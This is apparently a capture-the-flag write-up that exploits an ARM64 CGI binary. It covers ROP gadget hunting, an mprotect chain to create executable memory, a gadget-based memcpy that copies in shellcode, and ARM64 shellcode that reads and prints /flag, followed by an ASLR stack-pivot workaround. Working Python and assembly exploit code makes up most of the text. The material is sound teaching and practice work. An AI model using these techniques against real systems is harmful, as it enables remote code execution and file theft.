Some of the gadgets will do ldp x29, x30, [sp], #something, ..., ret, meaning that they will load x30 from the stack, advance the stack, and then return to x30. If after that one, we use a gadget with a simple ret, like the one above, we will end up in an infinite loop (x30 will not be changing).

One option is to use a gadget that branches using another register (only br, as blr also sets the link register).

The idea to execute ret-only gadgets would be to find a gadget that does:

ldp/ldr xN, [sp, #k]
ldp x29, x30, [sp], #something
br xN

We don’t really care about the order of the first two, though. I used the following query in ropper to find one such gadget:

$ ropper -f pwn.cgi --search "%ldp x29, x30%br"
(...)
0x000000000042b788: ldr x16, [sp, #0x60]; ldp x0, x1, [sp, #0x90]; ldp x29, x30, [sp], #0x100; br x16; 
0x0000000000427d0c: ldr x16, [sp, #0x60]; ldp x1, x0, [sp, #0x78]; ldp x29, x30, [sp], #0xb0; br x16; 
0x000000000042988c: ldr x16, [sp, #0x60]; ldp x29, x30, [sp], #0xf0; br x16; 
(...)

Let’s take a look at the second one:

0x0000000000427d0c:
  ldr x16, [sp, #0x60];
  ldp x1, x0, [sp, #0x78];
  ldp x29, x30, [sp], #0xb0;
  br x16;

Load x16 from the stack (sp + 0x60) ✓
Load x1, x0 from the stack (sp + 0x78, sp + 0x80) ✓
Load x29, x30 from the stack and advance it by 0xb0 ✓
Branch to x16 ✓

So we can put the address of mprotect in x16, the first two arguments in x0, and x1, and then the address of the next gadget in x30.

Calling `mprotect`

Finding an `x2`-load gadget.

We have found a gadget that allows us to call mprotect with custom values of x0, and x1. Remember that mprotect takes three parameters:

int mprotect(void* addr, size_t size, int flags)

So we need a gadget that sets x2 with the flags that we want (PROT_READ|PROT_WRITE|PROT_EXEC). Again, we have multiple options:

Find a gadget that sets that specific constant in x2.
Find a gadget that loads a value into x2 from the stack.
Mov from a previously controlled register into x2.

The queries for the first two options didn’t yield anything useful:

$ ropper -f pwn.cgi --search "mov x2, #"
$ ropper -f pwn.cgi --search "ldr x2,"

But the last one did:

$ ropper -f pwn.cgi --search "mov x2, x%"
(...)
0x00000000004057dc: mov x2, x23; mov x1, x27; mov x0, x26; blr x24;
(...)

This gadget will:

Move x23 into x2 (we control x23, as it was picked up from the stack). ✓
Move x27 into x1 (we don’t care, as we will overwrite it).
Move x26 into x0 (we don’t care, as we will overwrite it).
Branch with link into x24 (we control x24, as it was picked up from the stack). ✓

Testing the partial chain

So now we can do:

Stack pivot gadget, setting:

x30 (sp + 0x08) to x2-load gadget address (0x4057dc).
x23 (sp + 0x30) to PROT_READ|PROT_WRITE|PROT_EXEC.
x24 (sp + 0x38) to x16-branch gadget address (0x427d0c).

x2-load gadget. No stack usage.
x16-branch gadget address, setting:

x16 (sp + 0x60) to mprotect.
x1 (sp + 0x78) to the mapping size.
x0 (sp + 0x80) to the mapping address.
x30 (sp + 0x08) to the address of the next gadget (print address).
Some extra data to fill the stack (the gadget advances the stack by 0xb0 bytes).
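One way to keep these offsets straight is to describe each gadget's stack frame as a mapping from offset to value and let a helper fill in the rest. This is a sketch using only struct; build_frame is a hypothetical helper, and the mprotect address and size values are the ones this post settles on below.

```python
import struct

def build_frame(size: int, slots: dict, filler: int = 0xdeadbeef) -> bytes:
    """Build a `size`-byte stack frame with 64-bit values at given offsets."""
    assert size % 8 == 0
    words = [filler] * (size // 8)
    for offset, value in slots.items():
        assert offset % 8 == 0 and offset < size
        words[offset // 8] = value
    return struct.pack(f'<{len(words)}Q', *words)

# Frame consumed by the stack pivot gadget (advances sp by 0x40).
pivot_frame = build_frame(0x40, {
    0x08: 0x4057dc,  # x30: x2-load gadget
    0x30: 0x7,       # x23: PROT_READ|PROT_WRITE|PROT_EXEC
    0x38: 0x427d0c,  # x24: x16-branch gadget
})
# Frame consumed by the x16-branch gadget (advances sp by 0xb0).
branch_frame = build_frame(0xb0, {
    0x08: 0x400684,  # x30: next gadget
    0x60: 0x420440,  # x16: mprotect
    0x78: 0x1000,    # x1: mapping size
    0x80: 0x47d000,  # x0: mapping address
})
chain = pivot_frame + branch_frame
print(len(chain))
```

Writing the frames this way makes the offsets visible at a glance, at the cost of hiding the sequential order in which the gadgets consume the stack.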

Which address do we want to mprotect? Well, let’s see which mappings are available.

$ readelf -Wl ./pwn.cgi 

Elf file type is EXEC (Executable file)
Entry point 0x400700
There are 6 program headers, starting at offset 64

Program Headers:
  Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  LOAD           0x000000 0x0000000000400000 0x0000000000400000 0x07de74 0x07de74 R E 0x10000
  LOAD           0x07e830 0x000000000048e830 0x000000000048e830 0x0057f8 0x00ae98 RW  0x10000
  NOTE           0x000190 0x0000000000400190 0x0000000000400190 0x000044 0x000044 R   0x4
  TLS            0x07e830 0x000000000048e830 0x000000000048e830 0x000020 0x000068 R   0x8
  GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x10
  GNU_RELRO      0x07e830 0x000000000048e830 0x000000000048e830 0x0037d0 0x0037d0 R   0x1

We can pick the last page of the executable code, hoping that it will not collide with any code. So mapping_addr = 0x47d000, mprotect_size = 0x1000.
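The page address follows from the first LOAD segment in the readelf output. A quick sketch of the arithmetic, assuming 4 KiB pages as the mprotect size above does (the variable names are mine):

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

# First LOAD segment from readelf: VirtAddr and MemSiz of the R E mapping.
seg_vaddr = 0x400000
seg_memsz = 0x07de74

seg_end = seg_vaddr + seg_memsz
mapping_addr = (seg_end - 1) & ~(PAGE_SIZE - 1)  # page holding the last byte
mprotect_size = PAGE_SIZE

print(hex(seg_end), hex(mapping_addr))
```

The segment ends at 0x47de74, so the page starting at 0x47d000 is the last one that belongs to the executable mapping.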

import mmap

def rop():
  keyvals = [
    b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
    b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
  ]

  payload = b'&'.join(keyvals)
  payload += b'\x00' * (0x58 - len(payload))

  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  mprotect_addr = 0x420440
  mapping_addr = 0x47d000
  mprotect_size = 0x1000
  mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
  
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x4057dc)   # x30, x2-load gadget
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
  rop.raw(0x427d0c) # x24, x16-branch gadget

  """
    The x2-load gadget doesn't touch the stack.
    It will branch to x24, x16-branch gadget.

  0x4057dc:
    mov x2, x23;
    mov x1, x27;
    mov x0, x26;
    blr x24;
  """

  """
    The x16-branch gadget loads x16, x1, x0, x29 and x30 from
    the stack, advances the stack and branches to x16.

  0x427d0c:
    ldr x16, [sp, #0x60];
    ldp x1, x0, [sp, #0x78];
    ldp x29, x30, [sp], #0xb0;
    br x16; 
  """
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x00400684) # x30, puts function.
  for i in range((0x60-0x10)//8):
    rop.raw(0xdeadbeef) # filling until 0x60
  rop.raw(mprotect_addr) # sp + 0x60
  rop.raw(0xdeadbeef) # sp + 0x68
  rop.raw(0xdeadbeef) # sp + 0x70
  rop.raw(mprotect_size) # sp + 0x78 x1, size
  rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
  for i in range((0xb0 - 0x88)//8):
    rop.raw(0xdeadbeef) # Filling until 0xb0.

  payload += rop.chain()
  return payload

We can follow along with gdb!

>>> payload = rop()
>>> run_with_gdb(payload)

(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) b *0x400998
Breakpoint 5 at 0x400998
(gdb) c
Continuing.

Breakpoint 5, 0x0000000000400998 in parse_body ()
(gdb) x /20i $pc
=> 0x400998 <parse_body+312>:   ldp     x19, x20, [sp, #16]
   0x40099c <parse_body+316>:   ldp     x21, x22, [sp, #32]
   0x4009a0 <parse_body+320>:   ldp     x23, x24, [sp, #48]
   0x4009a4 <parse_body+324>:   ldp     x29, x30, [sp], #160
   0x4009a8 <parse_body+328>:   ret
(gdb) x /2gx $sp
0x550079b2d0:   0x00000055007ce090      0x0000000000440408

We can see that x29 and x30 will take our buffer addr and the stack pivot gadget address. After a few more instructions, we execute the ret:

(gdb) si
0x0000000000440408 in is_trusted_path_normalize ()
(gdb) x /6i $pc
=> 0x440408 <is_trusted_path_normalize+280>:    mov     sp, x29
   0x44040c <is_trusted_path_normalize+284>:    ldp     x19, x20, [sp, #16]
   0x440410 <is_trusted_path_normalize+288>:    ldp     x21, x22, [sp, #32]
   0x440414 <is_trusted_path_normalize+292>:    ldp     x23, x24, [sp, #48]
   0x440418 <is_trusted_path_normalize+296>:    ldp     x29, x30, [sp], #64
   0x44041c <is_trusted_path_normalize+300>:    ret
(gdb) si
0x000000000044040c in is_trusted_path_normalize ()
(gdb) p /x $sp
$13 = 0x55007ce090
(gdb) x /10gx $sp
0x55007ce090:   0x00000000deadbeef      0x00000000004057dc # x29, x30
0x55007ce0a0:   0x00000000deadbeef      0x00000000deadbeef # x19, x20
0x55007ce0b0:   0x00000000deadbeef      0x00000000deadbeef # x21, x22
0x55007ce0c0:   0x0000000000000007      0x0000000000427d0c # x23, x24
0x55007ce0d0:   0x00000000deadbeef      0x0000000000400684

After a few more instructions, we are in the x2-load gadget:

(gdb) si
0x00000000004057dc in msort_with_tmp.part ()
(gdb) x /4i $pc
=> 0x4057dc <msort_with_tmp.part.0+156>:        mov     x2, x23
   0x4057e0 <msort_with_tmp.part.0+160>:        mov     x1, x27
   0x4057e4 <msort_with_tmp.part.0+164>:        mov     x0, x26
   0x4057e8 <msort_with_tmp.part.0+168>:        blr     x24
(gdb) p /x $x23
$14 = 0x7
(gdb) p /x $x24
$15 = 0x427d0c

And from there, we should get to the x16-branch gadget:

(gdb) x /4i $pc
=> 0x427d0c <__gconv_transform_internal_ucs4le+972>:    ldr     x16, [sp, #96]
   0x427d10 <__gconv_transform_internal_ucs4le+976>:    ldp     x1, x0, [sp, #120]
   0x427d14 <__gconv_transform_internal_ucs4le+980>:    ldp     x29, x30, [sp], #176
   0x427d18 <__gconv_transform_internal_ucs4le+984>:    br      x16
(gdb) x /6gx $sp + 0x60
0x55007ce130:   0x0000000000420440      0x00000000deadbeef # mprotect address, _
0x55007ce140:   0x00000000deadbeef      0x0000000000001000 # _, size
0x55007ce150:   0x000000000047d000      0x00000000deadbeef # mapping address
(gdb) x /2gx $sp
0x55007ce0d0:   0x00000000deadbeef      0x0000000000400684 # x29, x30

And from there, to mprotect:

(gdb) si
0x0000000000420440 in mprotect ()
(gdb) x /5i $pc
=> 0x420440 <mprotect>: nop
   0x420444 <mprotect+4>:       mov     x8, #0xe2                       // #226
   0x420448 <mprotect+8>:       svc     #0x0
   0x42044c <mprotect+12>:      cmn     x0, #0xfff
   0x420450 <mprotect+16>:      b.cs    0x420458 <mprotect+24>  // b.hs, b.nlast
(gdb) si
0x0000000000420444 in mprotect ()
(gdb) si
0x0000000000420448 in mprotect ()
(gdb) si
0x0000000000420450 in mprotect ()
(gdb) p /x $x0
$16 = 0x0

mprotect succeeded ✅︎

We can check that by running it with strace:

>>> print(run_with_strace(payload).decode())
(...)
Content-type: text/html
14230 write(1,0x49b020,24) = 24

14230 write(1,0x49b020,1) = 1
14230 mprotect(0x000000000047d000,4096,PROT_EXEC|PROT_READ|PROT_WRITE) = 0
<h1>Please provide your name with the name= parameter.</h1>
14230 write(1,0x49b020,60) = 60
(...)

Executing our own code

Our goal is to get control over that process. We want to execute arbitrary code, and using rop is tedious. Now that we have a writable and executable region of memory, we can write our own code to it.

Writing a small shellcode

Let’s start by writing a simple shellcode that writes a custom string to stdout.

From the syscalls table, we know that we need to put:

0x40 in x8
0x1 in x0
a string in x1
the size in x2

Let’s also call exit so we close the program, that’s 0x5d

def shellcode():
  code = pwn.asm("""
    mov x8, #0x40
    mov x0, #1
    adr x1, hello_world
    mov x2, #hello_world_len
    svc #0

    mov x8, #0x5d
    mov x0, #0
    svc #0

hello_world:
  .asciz "Hello, World\\n"
hello_world_len = . - hello_world
  """)

  return code
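To keep the magic numbers straight, the syscall numbers that appear in this write-up can be collected in one place. This is only a convenience sketch; `SYSCALLS` and `x8_for` are hypothetical names, and the values are the arm64 Linux numbers already used in the text and in the gdb output.

```python
# arm64 Linux syscall numbers used in this write-up (the value goes in x8).
SYSCALLS = {
    "openat": 56,     # 0x38
    "read": 63,       # 0x3f
    "write": 64,      # 0x40
    "exit": 93,       # 0x5d
    "mprotect": 226,  # 0xe2
}

def x8_for(name):
    """Return the immediate for `mov x8, #...` as a hex string."""
    return hex(SYSCALLS[name])

for name in ("write", "exit"):
    print(f"{name}: mov x8, #{x8_for(name)}")
```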

Copying the code

Now for the tedious part… We need to copy our code to the executable page… using rop.

We can use a gadget like this one:

0x00000000004450fc:
    str x20, [x19, #8];
    ldp x19, x20, [sp, #0x10];
    ldp x29, x30, [sp], #0x20;
    ret;

This stores x20 at the address x19 + 8, then loads x29, x30, x19 and x20 from the stack and returns. We can repeat this gadget to copy 8 bytes at a time.

Our first gadget should be a subset of this one, without the write, so we can have control over x19 and x20:

0x0000000000445100:
    ldp x19, x20, [sp, #0x10];
    ldp x29, x30, [sp], #0x20;
    ret;

So now let’s write our memcpy implementation!

def memcpy(rop, dst, data, return_addr):
  # Callers must start by jumping into `0x445100`
  # We have control over everything that's next on the stack.
  memcpy_gadget = 0x4450fc

  while len(data) > 8:
    rop.raw(0xdeadbeef) # x29
    rop.raw(memcpy_gadget) # x30
    rop.raw(dst - 0x8) # x19
    rop.raw(pwn.u64(data[:8])) # x20

    dst += 0x8
    data = data[8:]

  # Copy the last part.
  data += b'\x00' * 8
  rop.raw(0xdeadbeef)  # x29
  rop.raw(memcpy_gadget)
  rop.raw(dst - 0x8)
  rop.raw(pwn.u64(data[:8]))
  # This will perform the last store
  # And jump to return_addr.
  rop.raw(0xdeadbeef)
  rop.raw(return_addr)
  rop.raw(0xdeadbeef)
  rop.raw(0xdeadbeef)

  return
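Since a mistake in this chain only shows up as a crash, it can help to check the logic offline first. The sketch below is not part of the original exploit: it rebuilds the same chain as a plain list of 64-bit words and runs it through a tiny model of the two gadgets. `build_copy_chain` and `simulate` are hypothetical names, and the model only understands the two gadget addresses shown above.

```python
import struct

LOAD_GADGET = 0x445100   # ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret
STORE_GADGET = 0x4450fc  # str x20, [x19, #8]; then the same loads and ret

def build_copy_chain(dst, data, return_addr):
    """Return the stack words for the copy, mirroring memcpy() above."""
    data = data + b"\x00" * (-len(data) % 8)  # pad to a multiple of 8 bytes
    words = []
    for off in range(0, len(data), 8):
        (value,) = struct.unpack_from("<Q", data, off)
        words += [0xdeadbeef, STORE_GADGET, dst + off - 8, value]
    # Final frame: the last store runs, then we return to return_addr.
    words += [0xdeadbeef, return_addr, 0xdeadbeef, 0xdeadbeef]
    return words

def simulate(words, return_addr):
    """Model the gadgets; sp counts 8-byte words. Returns the written memory."""
    memory = {}
    sp, x19, x20 = 0, 0, 0
    pc = LOAD_GADGET  # callers enter through the load-only gadget
    while pc != return_addr:
        if pc == STORE_GADGET:
            memory[x19 + 8] = x20
        elif pc != LOAD_GADGET:
            raise ValueError(f"unexpected pc {pc:#x}")
        x19, x20 = words[sp + 2], words[sp + 3]
        pc = words[sp + 1]
        sp += 4  # ldp x29, x30, [sp], #0x20
    return memory

chain = build_copy_chain(0x47d000, b"ABCDEFGHIJ", 0x47d000)
written = simulate(chain, 0x47d000)
assert written[0x47d000] == int.from_bytes(b"ABCDEFGH", "little")
assert written[0x47d008] == int.from_bytes(b"IJ", "little")
```

Each 8 bytes of shellcode costs 32 bytes of chain, which is worth keeping in mind given the limited size of the read buffer.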

Updating our rop-chain

Our updated code looks like this (note that we need to change the puts addr to the memcpy address):

import mmap

def rop():
  keyvals = [
    b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
    b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
  ]

  payload = b'&'.join(keyvals)
  payload += b'\x00' * (0x58 - len(payload))

  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  mprotect_addr = 0x420440
  mapping_addr = 0x47d000
  mprotect_size = 0x1000
  mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
  
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x4057dc)   # x30, x2-load gadget
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
  rop.raw(0x427d0c) # x24, x16-branch gadget

  """
    The x2-load gadget doesn't touch the stack.
    It will branch to x24, x16-branch gadget.

  0x4057dc:
    mov x2, x23;
    mov x1, x27;
    mov x0, x26;
    blr x24;
  """

  """
    The x16-branch gadget loads x16, x1, x0, x29 and x30 from
    the stack, advances the stack and branches to x16.

  0x427d0c:
    ldr x16, [sp, #0x60];
    ldp x1, x0, [sp, #0x78];
    ldp x29, x30, [sp], #0xb0;
    br x16; 
  """
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x00445100) # x30, memcpy addr.
  for i in range((0x60-0x10)//8):
    rop.raw(0xdeadbeef) # filling until 0x60
  rop.raw(mprotect_addr) # sp + 0x60
  rop.raw(0xdeadbeef) # sp + 0x68
  rop.raw(0xdeadbeef) # sp + 0x70
  rop.raw(mprotect_size) # sp + 0x78 x1, size
  rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
  for i in range((0xb0 - 0x88)//8):
    rop.raw(0xdeadbeef) # Filling until 0xb0.

  code = shellcode()

  memcpy(rop, mapping_addr, code, mapping_addr)
  
  payload += rop.chain()
  return payload

>>> payload = rop()
>>> run(payload)
b'Content-type: text/html\n\nHello, World\n\x00'

Printing out the flag.

Now that we can write our own code, to win the challenge we need to print out the flag. So let’s modify our shellcode to openat (0x38) the file stored in /flag, read it to a stack buffer, and print it via stdout.

Let’s create a temporary flag for now, in /tmp while we test locally:

$ echo -n "srelabs{fake-flag}" > /tmp/flag

def shellcode():
  code = pwn.asm("""
    mov x8, #0x40
    mov x0, #1
    adr x1, hello_world
    mov x2, #hello_world_len
    svc #0

    // Open the flag.
    mov x8, #0x38 // SYS_openat
    mov x0, #-100 // AT_FDCWD
    adr x1, flag_path
    mov x2, #0 // O_RDONLY
    svc #0

    // Store the fd on a register.
    mov x20, x0

    // Read it into the stack.
    mov x8, #0x3f // SYS_read
    mov x0, x20
    sub x1, sp, #0x100
    mov x2, #0x100
    svc #0

    // x0 has the size of the read.
    mov x21, x0

    // Write it into stdout
    mov x8, #0x40
    mov x0, #1
    sub x1, sp, #0x100
    mov x2, x21
    svc #0
    
    mov x8, #0x5d
    mov x0, #0
    svc #0

flag_path:
  .asciz "/tmp/flag"
hello_world:
  .asciz "Hello, World\\n"
hello_world_len = . - hello_world
  """)

  return code

>>> payload = rop()
>>> print(run(payload).decode())
Content-type: text/html

Hello, World
srelabs{fake-flag}

Success! ✅︎

Overcoming ASLR

Using a real machine.

At some point, I decided to get a real arm64 machine. Luckily, multiple cloud providers allow you to spawn arm64 instances for cheap. For example, GCE, AWS EC2, Hetzner, and Oracle Cloud. After the vm is provisioned, you can install apache2 and enable the CGI-bin module. With that, you should have a setup very close to the one used in the challenge.

You can use similar scripts to run it locally, or against the http server. For using gdb, I wrote a function that saves the payload to a file and then just runs that.
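A helper along those lines could look roughly like the following. This is a sketch rather than the exact function I used: `run_from_file` and the default file name `payload` are placeholders, and it only relies on the standard `subprocess` module.

```python
import subprocess

def run_from_file(argv, payload, path="payload"):
    """Save `payload` to `path`, then run `argv` with that file as stdin."""
    with open(path, "wb") as f:
        f.write(payload)
    with open(path, "rb") as stdin:
        result = subprocess.run(argv, stdin=stdin, stdout=subprocess.PIPE)
    return result.stdout
```

For example, `run_from_file(["./pwn.cgi"], rop())` leaves a `payload` file behind that can be reused from gdb with `run < payload`.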

If we try to run our script there, we will see it failing every time: we need to guess the exact layout up to 3 bytes deep. We can maybe shorten that by doing a huge rop-slide, but it’s still too much.

Address Space Layout Assumptions

If we reflect upon our assumptions, the only assumptions that we made were:

The location of the x30 register (2 bytes).
The location of the x29 register (2 bytes).
The location of our read buffer (3 bytes).

The first two are not 2 bytes exactly, as we know they are next to each other, and one ends with an 8 and the other with a 0, so it’s basically 3 nibbles. We can bruteforce that. But guessing the read buffer is more challenging.

I spent a ton of time thinking about this; you can read more in the “Failed experiments” section. In the end, I decided that it was not feasible to guess the stack address, and that instead, it might be available somehow.

Register State Analysis

I set up a breakpoint at the end of parse_body, and analyzed both the stack and the registers… And I couldn’t find anything.

I looked for gadgets that would let me add arbitrary stuff to the sp, which would allow me to get to the read buffer. I found this gadget:

0x000000000042152c:
  ldp x29, x30, [sp];
  ldr x19, [sp, #0x10];
  add sp, sp, x12;
  ret;

Which, if we control x12, would let us jump straight to our buffer. I tried multiple things, but I could not change the value of x12:

x12            0x5950

Note

In QEMU, it seems like x12 is modified during parse_body, but in the arm VM it is not. This seems to be because in QEMU, libc decides to use __memcpy_generic during strncpy, whereas in the VM it uses __memcpy_simd. It is probable that on the real challenge, they also use __memcpy_simd.

This value is not large enough to reach our read buffer (we need at least 4000*0x34 = 208000 bytes).

However, while testing solutions trying to see what registers we do control, I noticed that if we provide the 0x34 key-value pairs, we get x7 pointing to the position after the last &. This means that if we find a way to pivot the stack into the value stored in x7, we should be able to win.

def test_x7():
  payloads = [b'a=b&'] * 0x34
  payload = b''.join(payloads)
  payload += pwn.p32(0xdeadbeef)
  return payload

>>> run_with_gdb(test_x7())

(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) c
Continuing.

Breakpoint 6, 0x0000000000400998 in parse_body ()
(gdb) p /x $x7
$19 = 0x55007ce108
(gdb) x /1gx $x7
0x55007ce108:   0x00000000deadbeef

We now have a register that tells us where the stack is, let’s see if we can do a stack pivot with that somehow.

Hunting for stack pivot gadgets

The first thing we want to find out is whether there’s a way to work with x7: storing it into the stack, moving it into another register, etc.

I found a few that were not complete garbage:

0x000000000040597c: str x7, [sp, #0x70]; mov x0, x26; blr x24;
0x000000000044615c: str x7, [sp, #0x108]; stp q0, q16, [x8]; bl #0x45930; ldp x29, x30, [sp], #0x110; ret; 
0x0000000000445fc4: str x7, [sp, #0x108]; stp q16, q17, [x8]; bl #0x45930; ldp x29, x30, [sp], #0x110; ret

The first one in particular seems simple enough: it stores x7 in the stack, then branches to x24 (which was restored from the stack at the end of parse_body). So we can use that to chain another rop gadget.

We now need to somehow pick up that value from the stack. We already have a gadget that moves x29 into sp, so we just need a way to load it into x29.

0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;

The first time we execute that rop gadget, we will load x29 and x30 from the stack, and increment the stack by 0x70. If we execute this gadget twice, the second time the stack would be where we stored x7, and the value will be loaded into x29. From there, we can do a normal stack pivot.

So our rop chain now becomes something like this:

0x000000000040597c: str x7, [sp, #0x70]; mov x0, x26; blr x24;
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
0x0000000000440408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;

And we need to:

Override parse_body’s x30 in the stack, making it point to x7-store gadget (0x40597c).
Override parse_body’s x24 in the stack, making it point to stack-advance gadget (0x40c46c).
Override sp + 160 + 0x8, making it point to stack-advance gadget.
Override sp + 160 + 0x70 + 0x8, making it point to stack-pivot gadget (0x440408).

It’s a bit tricky, because we need to modify 4 values, and each iteration of the key-value modification loop advances the pointer by 2000 bytes. However, given that we are modifying 2 bytes, as long as we stay within the same 16-bit boundary, we are fine.

Let’s see an example:

Let’s assume parse_body’s sp is at 0xffffff50e300, from there, keys will be 0xe8 bytes after, so it would be at 0xffffff50e3e8, and the next pointer will be 2000 bytes from it, at 0xffffff50ebb8, and so on. The first 6 values will be:

0xffffff50e3e8
0xffffff50ebb8
0xffffff50f388
0xffffff50fb58
0xffffff510328 # <- changes more than 2 bytes
0xffffff510af8

In this particular scenario, we can only write 4 values, but if we get a stack layout starting at a lower number, we would have more opportunities to write. We will explore that after we finish with the exploit.
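The same count can be reproduced with a few lines of Python. This is a minimal sketch under the assumptions stated in the example (keys start 0xe8 bytes after sp, and consecutive slots are 2000 bytes apart); `reachable_key_slots` is a hypothetical helper, and it treats a slot as usable only while its upper bits match those of the first slot.

```python
KEYS_OFFSET = 0xe8  # distance from parse_body's sp to the first key slot
KEY_STRIDE = 2000   # bytes between consecutive key slots

def reachable_key_slots(sp, limit=0x34):
    """Key-slot addresses that share everything but the low 16 bits."""
    first = sp + KEYS_OFFSET
    slots = []
    for i in range(limit):
        addr = first + i * KEY_STRIDE
        if addr >> 16 != first >> 16:
            break  # a 2-byte overwrite can no longer redirect this one
        slots.append(addr)
    return slots

for addr in reachable_key_slots(0xffffff50e300):
    print(hex(addr))
```

For the example sp this prints the first four addresses of the list above and stops before 0xffffff510328.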

The values that we need to modify are:

sp + 0x08 (x30 on stack)
sp + 0x38 (x24 on stack)
sp + 160 + 0x08 (where the third gadget will be loaded from).
sp + 160 + 0x70 + 0x08 (where the fourth gadget will be loaded from.)
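These four offsets can be double-checked by walking sp through the gadgets by hand. The sketch below does that bookkeeping in Python; it only models the stack-pointer adjustments quoted in the gadget listings, and `trace_pivot_slots` is a hypothetical name.

```python
def trace_pivot_slots():
    """Walk sp through the chain; offsets are relative to parse_body's sp."""
    slots = {}
    sp = 0
    # parse_body epilogue: ldp x23, x24, [sp, #48]; ldp x29, x30, [sp], #160
    slots["x30 -> x7-store gadget"] = sp + 0x08
    slots["x24 -> stack-advance gadget"] = sp + 0x38
    sp += 160
    # x7-store gadget: str x7, [sp, #0x70]; blr x24 (sp is unchanged)
    x7_slot = sp + 0x70
    # First stack-advance gadget: ldp x29, x30, [sp], #0x70
    slots["x30 -> stack-advance gadget (again)"] = sp + 0x08
    sp += 0x70
    # Second stack-advance gadget: x29 now comes from the slot holding x7.
    assert sp == x7_slot
    slots["x30 -> stack-pivot gadget"] = sp + 0x08
    return slots

for name, offset in trace_pivot_slots().items():
    print(f"sp + {offset:#05x}: {name}")
```

The assertion in the middle is the important part: the second `ldp x29, x30` reads exactly the slot where x7 was stored.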

With our sp value of 0xffffff50e300, this will make:

0xffffff50e308
0xffffff50e338
0xffffff50e3a8
0xffffff50e418

However, there’s a problem with these addresses: the second one has a 0x38 byte. It took me a while to debug it, but 0x38 is &, so that would break everything (remember: we have to avoid NUL-bytes, & and =).

Let’s come up with a different address… like this one: 0xffffe55f9d10, this will get us:

0xffffe55f9d18
0xffffe55f9d48
0xffffe55f9db8
0xffffe55f9e28
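Since only the low two bytes of each address end up in the payload, a small helper makes it easy to try different sp guesses. This is an illustrative sketch (the name `low16_targets` is made up), using `struct` in place of `pwn.p16`.

```python
import struct

# Offsets of the four slots, relative to parse_body's sp.
SLOT_OFFSETS = (0x08, 0x38, 160 + 0x08, 160 + 0x70 + 0x08)

def low16_targets(sp):
    """Low two bytes (little-endian) of each slot address for a guessed sp."""
    return [struct.pack("<H", (sp + off) & 0xffff) for off in SLOT_OFFSETS]

for sp in (0xffffff50e300, 0xffffe55f9d10):
    print(hex(sp), [t.hex() for t in low16_targets(sp)])
```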

And with that, we can start writing our payload:

def rop():
  keyvals = [
    b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(0x9d18),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9d48),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9db8),
    b'\x08\x04\x44=' + b'a'*28 + pwn.p16(0x9e28),
  ]

  keyvals += [b'a=b'] * (0x34 - len(keyvals))
  # The last entry should leave the stack aligned on a 16-byte boundary.
  # As aarch64 will crash if sp is not aligned to 16 bytes.
  # the read buffer starts at an address ending with 8, so we need
  # to add an extra 8 bytes to align it to 16 bytes.
  payload = b'&'.join(keyvals) + b'a='
  payload += b'b' * (16 - (len(payload) % 16) - 1) + b'x' * 8 + b'&'

  """
    If everything went well, we are executing the stack pivot gadget:
    0x0000000000440408:
      mov sp, x29;
      ldp x19, x20, [sp, #0x10];
      ldp x21, x22, [sp, #0x20];
      ldp x23, x24, [sp, #0x30];
      ldp x29, x30, [sp], #0x40;
      ret;

      Let's try calling the puts function.
  """

  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  puts_addr = 0x400684

  rop.raw(0xdeadbeef) # x29
  rop.raw(puts_addr)  # x30
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(0xdeadbeef) # x23
  rop.raw(0xdeadbeef) # x24

  payload += rop.chain()

  return payload
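The padding formula for the last key-value pair is a bit cryptic, so here is a quick sanity check of what it guarantees. It is a sketch under the assumption stated in the comments above (the read buffer starts at an address ending in 8); `pad_last_pair` is a hypothetical wrapper around the same expression.

```python
def pad_last_pair(prefix):
    """Append the final key=value pair using the same formula as rop()."""
    payload = prefix + b"a="
    payload += b"b" * (16 - (len(payload) % 16) - 1) + b"x" * 8 + b"&"
    return payload

for n in range(64):
    padded = pad_last_pair(b"k" * n)
    # The buffer starts at an address ending in 8, so a length of 8 (mod 16)
    # puts the byte right after the last '&' on a 16-byte boundary.
    assert len(padded) % 16 == 8
```

Whatever the length of the pairs before it, the chain that follows the last & therefore starts on an address that is valid as sp.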

